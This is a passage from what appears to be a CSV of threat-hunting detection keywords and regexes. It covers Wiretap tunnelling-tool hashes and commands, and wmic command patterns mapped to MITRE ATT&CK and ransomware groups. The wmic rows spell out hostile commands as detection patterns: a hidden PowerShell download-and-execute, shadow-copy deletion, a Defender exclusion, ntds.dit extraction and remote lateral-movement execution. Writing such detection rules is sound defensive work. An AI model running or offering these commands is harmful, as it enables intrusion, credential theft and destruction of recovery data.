TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*74ce40c0871314e1308984b12d93161faf806f6d508dd256678f09af1abc1052*",".{0,1000}74ce40c0871314e1308984b12d93161faf806f6d508dd256678f09af1abc1052.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*7ca32274aad66276fcbc12b50158356781277aa4efc50eee49c10f2eac192cef*",".{0,1000}7ca32274aad66276fcbc12b50158356781277aa4efc50eee49c10f2eac192cef.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*831096dedc1741e97c5a65d992cf8825a02bdcd43c76727d2a9d26638cfeedd3*",".{0,1000}831096dedc1741e97c5a65d992cf8825a02bdcd43c76727d2a9d26638cfeedd3.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*8432faf9d944bcf430ebb7d45282f84901a59eb5e4ae3fc9b7ba5226b7a4ce35*",".{0,1000}8432faf9d944bcf430ebb7d45282f84901a59eb5e4ae3fc9b7ba5226b7a4ce35.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*8fcc7cb6eee6a29804ae22281e0477c47de9a924bd7beb9bed24f7c1d84d8a9d*",".{0,1000}8fcc7cb6eee6a29804ae22281e0477c47de9a924bd7beb9bed24f7c1d84d8a9d.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*9a6975a16e6abee257353caa0216c7ee50aed1618cb05c73ee105ecd07e0bdf3*",".{0,1000}9a6975a16e6abee257353caa0216c7ee50aed1618cb05c73ee105ecd07e0bdf3.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*a059a3d56743994d8f3996e05725957ebb5099c97bdd8ee92ed739f552073f46*",".{0,1000}a059a3d56743994d8f3996e05725957ebb5099c97bdd8ee92ed739f552073f46.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*aa660d59e6c7783ebb9d4244d3991392ab602cd4fcd06457656bed2f61b7b51a*",".{0,1000}aa660d59e6c7783ebb9d4244d3991392ab602cd4fcd06457656bed2f61b7b51a.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*b1a6f85aa7693abc888ec5cd0313b16ae5e932dee4e04f495481935530276427*",".{0,1000}b1a6f85aa7693abc888ec5cd0313b16ae5e932dee4e04f495481935530276427.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*b710bdc87555b125cca39a89d2f41449b99afa567ec7e78f6e28b3f7bf872ac3*",".{0,1000}b710bdc87555b125cca39a89d2f41449b99afa567ec7e78f6e28b3f7bf872ac3.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*c88212e7221a28d2877ba03c01c5df776c61aa4e36bc5a5909bceea7545fdfb1*",".{0,1000}c88212e7221a28d2877ba03c01c5df776c61aa4e36bc5a5909bceea7545fdfb1.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*chisel server --port *",".{0,1000}chisel\sserver\s\-\-port\s.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","chisel","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*d04679accb8ad4bbd940d7afcb4d2765c3ea1421bb773b71e79f3f0233f847cd*",".{0,1000}d04679accb8ad4bbd940d7afcb4d2765c3ea1421bb773b71e79f3f0233f847cd.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*d520c8bd60a9f8da3a90b1b47194dfb17df78554a97de633fda813c0152c01b1*",".{0,1000}d520c8bd60a9f8da3a90b1b47194dfb17df78554a97de633fda813c0152c01b1.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*d59838007c4724beca80ad34c6adc749c526f6de636d79e06565499d0e390110*",".{0,1000}d59838007c4724beca80ad34c6adc749c526f6de636d79e06565499d0e390110.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*docker exec -it wiretap-client-1 bash*",".{0,1000}docker\sexec\s\-it\swiretap\-client\-1\sbash.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*download.wireguard.com/windows-client/*",".{0,1000}download\.wireguard\.com\/windows\-client\/.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*eeee2b0a6ad1c7e4614fed4dfbe58b63776f6a3a6758267b5a976b4dc4315f48*",".{0,1000}eeee2b0a6ad1c7e4614fed4dfbe58b63776f6a3a6758267b5a976b4dc4315f48.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*f9ddbf1047c9a2e24310e5dc68508504c69e037e47c624f32b4d25ff8b30ed87*",".{0,1000}f9ddbf1047c9a2e24310e5dc68508504c69e037e47c624f32b4d25ff8b30ed87.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*fc901b9f783876c3cb057dbed28b5612fd376963f148d1375bb0c8cf86bb2e10*",".{0,1000}fc901b9f783876c3cb057dbed28b5612fd376963f148d1375bb0c8cf86bb2e10.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*https://www.wireguard.com/install*",".{0,1000}https\:\/\/www\.wireguard\.com\/install.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*sandialabs/wiretap*",".{0,1000}sandialabs\/wiretap.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*WireGuard/wireguard-go*",".{0,1000}WireGuard\/wireguard\-go.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*wiretap add client --port *",".{0,1000}wiretap\sadd\sclient\s\-\-port\s.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*wiretap add server --*",".{0,1000}wiretap\sadd\sserver\s\-\-.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via 
WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*wiretap configure --*",".{0,1000}wiretap\sconfigure\s\-\-.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*wiretap expose --dynamic*",".{0,1000}wiretap\sexpose\s\-\-dynamic.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*wiretap expose list*",".{0,1000}wiretap\sexpose\slist.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*wiretap expose --local *",".{0,1000}wiretap\sexpose\s\-\-local\s.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*wiretap serve -f *",".{0,1000}wiretap\sserve\s\-f\s.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that 
tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*WIRETAP_E2EE_INTERFACE_API*",".{0,1000}WIRETAP_E2EE_INTERFACE_API.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*WIRETAP_E2EE_PEER_ENDPOINT*",".{0,1000}WIRETAP_E2EE_PEER_ENDPOINT.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*WIRETAP_E2EE_PEER_PUBLICKEY*",".{0,1000}WIRETAP_E2EE_PEER_PUBLICKEY.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*WIRETAP_RELAY_INTERFACE_IPV4*",".{0,1000}WIRETAP_RELAY_INTERFACE_IPV4.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" 
"*WIRETAP_RELAY_INTERFACE_IPV6*",".{0,1000}WIRETAP_RELAY_INTERFACE_IPV6.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*WIRETAP_RELAY_PEER_ALLOWED*",".{0,1000}WIRETAP_RELAY_PEER_ALLOWED.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*WIRETAP_RELAY_PEER_PUBLICKEY*",".{0,1000}WIRETAP_RELAY_PEER_PUBLICKEY.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*yum install *wireguard-*",".{0,1000}yum\sinstall\s.{0,1000}wireguard\-.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "* process call create *cmd.exe /c powershell.exe -nop -w hidden -c *IEX ((new-object 
net.webclient).downloadstring('https://*",".{0,1000}\sprocess\scall\screate\s.{0,1000}cmd\.exe\s\/c\spowershell\.exe\s\-nop\s\-w\shidden\s\-c\s.{0,1000}IEX\s\(\(new\-object\snet\.webclient\)\.downloadstring\(\'https\:\/\/.{0,1000}","greyware_tool_keyword","wmic","Threat Actors ran the following command to download and execute a PowerShell payload","T1059.001 - T1059.003 - T1569.002 - T1021.006","TA0002 - TA0005","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Collection","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe shadowcopy delete*",".{0,1000}\.exe\sshadowcopy\sdelete.{0,1000}","greyware_tool_keyword","wmic","VSS is a feature in Windows that allows for the creation of snapshots of a volume capturing its state at a specific point in time. Adversaries may abuse the wmic shadowcopy command to interact with these shadow copies for defense evasion purposes.","T1490 - T1562.002","TA0040 - TA0007","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*/NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True*",".{0,1000}\/NAMESPACE\:\\\\root\\Microsoft\\Windows\\Defender\sPATH\sMSFT_MpPreference\scall\sAdd\sExclusionExtension\=exe\sForce\=True.{0,1000}","greyware_tool_keyword","wmic","Windows Defender Tampering Via Wmic","T1489","TA0005","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://www.virustotal.com/gui/file/00820a1f0972678cfe7885bc989ab3e5602b0febc96baf9bf3741d56aa374f03/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Temp\*\ntds.dit*",".{0,1000}\\Temp\\.{0,1000}\\ntds\.dit.{0,1000}","greyware_tool_keyword","wmic","The NTDS.dit file is the heart of Active Directory including 
user accounts. If it's found in the Temp directory, it could indicate that an attacker has copied the file there in an attempt to extract sensitive information.","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Temp\*\ntds.jfm*",".{0,1000}\\Temp\\.{0,1000}\\ntds\.jfm.{0,1000}","greyware_tool_keyword","wmic","Like the ntds.dit file it should not normally be found in the Temp directory.","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Users\Public\*ntds.dit*",".{0,1000}\\Users\\Public\\.{0,1000}ntds\.dit.{0,1000}","greyware_tool_keyword","wmic","this file shouldn't be found in the Users\Public directory.
Its presence could be a sign of an ongoing or past attack.","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Users\Public\*ntds.jfm*",".{0,1000}\\Users\\Public\\.{0,1000}ntds\.jfm.{0,1000}","greyware_tool_keyword","wmic","Like the ntds.dit file it should not normally be found in this directory.","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ac i ntds*\\127.0.0.1\ADMIN$\*",".{0,1000}ac\si\sntds.{0,1000}\\\\127\.0\.0\.1\\ADMIN\$\\.{0,1000}","greyware_tool_keyword","wmic","The actor has executed WMIC commands [T1047] to create a copy of the ntds.dit file and SYSTEM registry hive using ntdsutil.exe","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*cmd /c wmic /node:* process call create ""C:\programdata\*",".{0,1000}cmd\s\s\/c\swmic\s\/node\:.{0,1000}\sprocess\scall\screate\s\""C\:\\programdata\\.{0,1000}","greyware_tool_keyword","wmic","suspicious lateral movement command executing payload from suspicious directories","T1570 - T1021","TA0008","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Lateral Movement","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*cmd /c wmic /node:* process call create 
""C:\Temp\*",".{0,1000}cmd\s\s\/c\swmic\s\/node\:.{0,1000}\sprocess\scall\screate\s\""C\:\\Temp\\.{0,1000}","greyware_tool_keyword","wmic","suspicious lateral movement command executing payload from suspicious directories","T1570 - T1021","TA0008","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Lateral Movement","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*cmd /c wmic /node:* process call create ""C:\users\*\AppData\Local\Temp*",".{0,1000}cmd\s\s\/c\swmic\s\/node\:.{0,1000}\sprocess\scall\screate\s\""C\:\\users\\.{0,1000}\\AppData\\Local\\Temp.{0,1000}","greyware_tool_keyword","wmic","suspicious lateral movement command executing payload from suspicious directories","T1570 - T1021","TA0008","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Lateral Movement","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*cmd /c wmic /node:* process call create ""C:\users\Public*",".{0,1000}cmd\s\s\/c\swmic\s\/node\:.{0,1000}\sprocess\scall\screate\s\""C\:\\users\\Public.{0,1000}","greyware_tool_keyword","wmic","suspicious lateral movement command executing payload from suspicious directories","T1570 - T1021","TA0008","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Lateral Movement","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*cmd.exe /C wmic /node:* /user:* /password:* os get caption*",".{0,1000}cmd\.exe\s\/C\swmic\s\/node\:.{0,1000}\s\/user\:.{0,1000}\s\/password\:.{0,1000}\sos\sget\scaption.{0,1000}","greyware_tool_keyword","wmic","gather information about Windows OS version and licensing on the hosts","T1047 - T1016 - T1082","TA0007 - TA0002 - TA0005","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Discovery","https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/","1","0","N/A","greyware tool - risks of False positive !","6","9","N/A","N/A","N/A","N/A" "*process call create ""powershell 
enable-psremoting -force""*",".{0,1000}process\scall\screate\s\""powershell\senable\-psremoting\s\-force\"".{0,1000}","greyware_tool_keyword","wmic","Enable WinRM remotely with wmic","T1021.006 - T1059.001 - T1047","TA0002 - TA0008 - TA0011","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Lateral Movement","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*start wmic /node:@C:\*.txt /user:*/password:* process call create *cmd.exe /c bitsadmin /transfer *.exe *",".{0,1000}start\swmic\s\/node\:\@C\:\\.{0,1000}\.txt\s\/user\:.{0,1000}\/password\:.{0,1000}\sprocess\scall\screate\s.{0,1000}cmd\.exe\s\/c\sbitsadmin\s\/transfer\s.{0,1000}\.exe\s.{0,1000}","greyware_tool_keyword","wmic","WMIC suspicious transfer ","T1105 - T1041 - T1048","TA0002 - TA0003 - TA0010","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Exploitation tool","N/A","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*Win32_Shadowcopy | ForEach-Object {$_.Delete();*",".{0,1000}Win32_Shadowcopy\s\|\sForEach\-Object\s\{\$_\.Delete\(\)\;.{0,1000}","greyware_tool_keyword","wmic","VSS is a feature in Windows that allows for the creation of snapshots of a volume capturing its state at a specific point in time. 
Adversaries may abuse the wmic shadowcopy command to interact with these shadow copies for defense evasion purposes.","T1490 - T1562.002","TA0040 - TA0007","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*wmic /* /user:administrator process call create *cmd.exe /c *",".{0,1000}wmic\s\/.{0,1000}\s\/user\:administrator\sprocess\scall\screate\s.{0,1000}cmd\.exe\s\/c\s.{0,1000}","greyware_tool_keyword","wmic","Lateral Movement with wmic","T1078 - T1028 - T1106 - T1105","TA0002 - TA0004","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*wmic /node:* /user:* /password:* process call create ""\\*\*.exe*",".{0,1000}wmic\s\/node\:.{0,1000}\s\/user\:.{0,1000}\s\/password\:.{0,1000}\sprocess\scall\screate\s\""\\\\.{0,1000}\\.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","wmic","Execute file hosted over SMB on remote system with specified credential","T1021.002 - T1047","TA0002 - TA0008","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Lateral Movement","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*wmic /node:* path Win32_TerminalServiceSetting where AllowTSConnections=""0"" call SetAllowTSConnections ""1""*",".{0,1000}wmic\s\/node\:.{0,1000}\spath\sWin32_TerminalServiceSetting\swhere\sAllowTSConnections\=\""0\""\scall\sSetAllowTSConnections\s\""1\"".{0,1000}","greyware_tool_keyword","wmic","Remotely start RDP with wmic","T1021.006 - T1112 - T1562.001","TA0002 - TA0008","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Lateral Movement","N/A","1","0","N/A","greyware tool - risks of False positive 
!","10","10","N/A","N/A","N/A","N/A" "*wmic /node:*.*.*.*computersystem get username*",".{0,1000}wmic\s\/node\:.{0,1000}\..{0,1000}\..{0,1000}\..{0,1000}computersystem\sget\susername.{0,1000}","greyware_tool_keyword","wmic","get the currently logged user with wmic","T1047 - T1033","TA0002 - TA0007","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","5","10","N/A","N/A","N/A","N/A" "*wmic /node:*localhost*computersystem get username*",".{0,1000}wmic\s\/node\:.{0,1000}localhost.{0,1000}computersystem\sget\susername.{0,1000}","greyware_tool_keyword","wmic","get the currently logged user with wmic","T1047 - T1033","TA0002 - TA0007","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","5","10","N/A","N/A","N/A","N/A" "*wmic computersystem get domain*",".{0,1000}wmic\scomputersystem\sget\sdomain.{0,1000}","greyware_tool_keyword","wmic","get domain name with wmic","T1016 - T1087.002","TA0007 - TA0009","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","5","10","N/A","N/A","N/A","N/A" "*wmic process call create*ntdsutil *ac i ntds* ifm*create 